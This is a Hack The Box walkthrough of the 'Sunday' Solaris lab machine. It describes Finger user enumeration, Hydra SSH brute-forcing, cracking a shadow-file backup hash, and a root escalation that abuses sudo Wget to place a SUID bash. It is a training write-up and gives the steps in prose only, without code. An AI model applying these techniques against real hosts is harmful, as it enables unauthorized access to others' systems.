Hack The Box – Sunday Walkthrough
Introduction
This was an easy Solaris machine that required enumerating users in the Finger service to identify the sunny user, bruteforcing it with Hydra to authenticate via SSH, cracking a user hash found in a backup folder to escalate to the sammy user and exploiting the SUID permission set against Wget to escalate privileges to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
From the initial scan, it can be identified that the Finger service is available, Finger is a protocol that can be used to obtain information about users logged into a remote host or network device. Performing another Nmap scan using the -p- flag to probe all ports:
This latest scan has identified that port 22022 is open, which upon further inspection will show that it is being used by SSH.
Enumerating Finger
Starting MSFconsole, searching for modules related to Finger, selecting the auxiliary/scanner/finger/finger_users module, setting the RHOSTS based on the target system and the user wordlist baed on the named.txt wordlist that comes with SecLists. Running the module:
A “sunny” user was found by the finger_users module, which could be used to bruteforce SSH credentials since it is running on port 22022.
Bruteforcing SSH Credentials
Using hydra to bruteforce the password, using the following flags:
- -f to stop the attack when a valid password is found
- -s to specify the port to target for the bruteforce attack
- -l to specify the username for the bruteforce attack
- -P to specify the wordlist to use for the bruteforce attack
- the service and target to bruteforce
It appears the password for sunny is “sunday”. Authenticating to the target box using SSH on port 22022 as the “sunny” user:
Privilege Escalation
Viewing common files and directories, a “backup” folder is identified in the root directory
It appears the backup directory contains a backup of the /etc/shadow file, a password hash for the “sammy” user can be found:
Adding the hash to a text file and using John the Ripper with the following flags to crack the previously found hashes:
- –wordlist to specify the wordlist to be used, in this case rockyou
- the text file containing the hashes, one per line
It appears the password for the sammy user is “Cooldude!”. Using the su command to switch to the sammy user. Running sudo -l to see whether the current user can execute commands as root, it looks like it can execute Wget:
This can be exploited as when Wget downloads a file remotely, the original permissions of the file are kept. Creating a script that will generate SUID copy of the /bin/bash binary on the local Kali host:
Downloading the file remotely using Wget, specifying the URL and file to save it as:
Executing the script:
After executing the new SUID bash binary with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host: